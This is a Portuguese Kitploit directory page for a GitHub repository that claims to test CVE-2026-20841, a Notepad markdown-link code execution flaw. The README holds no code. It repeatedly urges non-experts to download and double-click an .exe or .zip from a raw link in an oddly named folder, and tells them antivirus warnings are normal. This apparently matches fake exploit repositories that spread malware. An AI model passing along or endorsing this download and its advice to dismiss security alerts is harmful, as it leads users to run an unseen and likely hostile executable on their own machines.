Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-20841 — 🛠 Demonstra execução remota de código no Windows Notepad via links markdown que exploram protocolos de URL não seguros. | Kitploit
Ferramentas/GitHubGitHub/hamzamalik3461/cve-2026-20841
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubhamzamalik3461/cve-2026-20841

CVE-2026-20841

🛠 Demonstra execução remota de código no Windows Notepad via links markdown que exploram protocolos de URL não seguros.

Ver Repositório
122há 6h 28mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2026-20841 - Ferramenta de Teste de Segurança do Bloco de Notas do Windows

Download Releases

⚠️ O que é o CVE-2026-20841?

O CVE-2026-20841 é uma fraqueza de segurança conhecida no aplicativo Bloco de Notas do Windows. Ela afeta o recurso de markdown, que permite ao Bloco de Notas exibir texto formatado com links clicáveis. Essa fraqueza ocorre porque o mecanismo de markdown em execução dentro do Bloco de Notas não limita os tipos de links (chamados de protocolos de URL) que ele permite. Isso significa que um atacante pode criar um link que, ao ser clicado, faz o Bloco de Notas executar programas ou comandos que o usuário não pretendia executar.

Esta ferramenta fornece uma Prova de Conceito (PoC) para mostrar como essa falha de segurança funciona. Ela ajuda pesquisadores de segurança e especialistas em tecnologia a entender como a vulnerabilidade funciona e a testar se os sistemas estão em risco.

💻 Quem Deve Usar Esta Ferramenta?

Este projeto foi criado para pessoas que desejam:

  • Entender o risco do CVE-2026-20841 no Bloco de Notas do Windows
  • Testar se seus sistemas estão vulneráveis a esse problema de segurança
  • Melhorar suas medidas de segurança contra ataques de execução remota de código

Nenhuma habilidade de programação é necessária para executar este software. Ele é melhor utilizado por profissionais de TI ou usuários curiosos que desejam verificar seus dispositivos Windows.

🚀 Começando

Requisitos do Sistema

Antes de usar este software, certifique-se de que seu computador atende a estes requisitos:

  • Executando Windows 10 ou versões posteriores
  • Aplicativo Bloco de Notas instalado (Ele já vem incluído por padrão no Windows)
  • Conexão com a internet para baixar arquivos
  • Espaço em disco suficiente para o download (menos de 10 MB)

Permissões Necessárias

A ferramenta de teste pode precisar de permissão para executar programas no seu PC. Você pode ver avisos do Windows Defender ou do antivírus. Isso é normal porque a ferramenta simula como ataques reais poderiam funcionar.

Você deve executar a ferramenta apenas em computadores que você possui ou para os quais tem permissão de teste.

📥 Baixar e Instalar

Para obter o software, faça o seguinte:

  1. Vá para a página de versões.
    Clique neste botão grande para visitar a área de downloads:
    Download Releases

  2. Escolha a versão mais recente na página.
    Procure o arquivo que se encaixa no seu sistema (geralmente um arquivo .exe ou .zip).

  3. Baixe o arquivo.
    Clique no link do nome do arquivo para iniciar o download.

  4. Execute ou descompacte o software.

  • Se for um arquivo .exe, clique duas vezes para executá-lo.
  • Se for um arquivo .zip, clique com o botão direito e escolha "Extrair Tudo", depois abra a pasta e clique duas vezes no .exe dentro dela.
  1. Siga as instruções na tela.
    O software irá guiá-lo pelo processo de teste.

🧭 Como Usar o Software

Após a instalação, você verá uma janela simples com instruções. Veja como proceder:

  • Passo 1: Inicie o teste clicando no botão "Executar Teste".
  • Passo 2: O software simulará um arquivo markdown com links especiais.
  • Passo 3: Ele mostrará se o seu Bloco de Notas permite links clicáveis inseguros.
  • Passo 4: Revise o relatório de teste dentro do aplicativo ou em um arquivo na sua área de trabalho.

🔍 O Que Este Teste Faz?

A ferramenta cria um arquivo markdown falso contendo links que usam manipuladores de URL incomuns. Normalmente, esses links não deveriam abrir programas sem permissão. Mas, por causa do CVE-2026-20841, o Bloco de Notas não os bloqueia.

Quando você executa o teste, o software tenta abrir esses links no Bloco de Notas. Se tiver sucesso, o Bloco de Notas está vulnerável e pode permitir que atacantes executem código prejudicial.

🛠 Recursos

  • Lançamento de teste fácil com um clique
  • Relatório claro mostrando se o seu sistema está afetado
  • Interface de usuário simples, projetada para não especialistas
  • Suporta versões recentes do Windows
  • Tamanho de download pequeno

🔄 Como Atualizar

Para manter a precisão dos testes, baixe novas versões quando estiverem disponíveis:

  1. Visite a mesma página de versões novamente:
    https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip
  2. Encontre a versão mais recente no topo.
  3. Baixe e execute o novo arquivo conforme descrito na seção de download.

👥 Obter Ajuda e Suporte

Se você encontrar problemas, pode:

  • Verificar a aba "Issues" na página do GitHub para ver se outras pessoas têm o mesmo problema
  • Usar a página "Discussions" para perguntas e respostas
  • Encontrar informações de contato dos desenvolvedores na página principal do repositório

🔒 Fique Seguro

Esta ferramenta mostra como hackers poderiam usar falhas de segurança. Use-a com responsabilidade:

  • Não use em dispositivos que você não possui ou para os quais não tem permissão de teste.
  • Mantenha sempre seu software, incluindo o Windows, atualizado.
  • Evite clicar em links suspeitos em arquivos ou e-mails desconhecidos.

🗂 Tópicos Relacionados

Este projeto se relaciona a:

  • Pesquisa de segurança para o Bloco de Notas do Windows
  • Vulnerabilidades de injeção de comandos
  • Riscos de execução remota de código (RCE)
  • Conscientização em cibersegurança
  • Ferramentas de teste de vulnerabilidades

Você pode começar a testar agora visitando a página de downloads:
Baixar Ferramenta CVE-2026-20841

Baixar ferramenta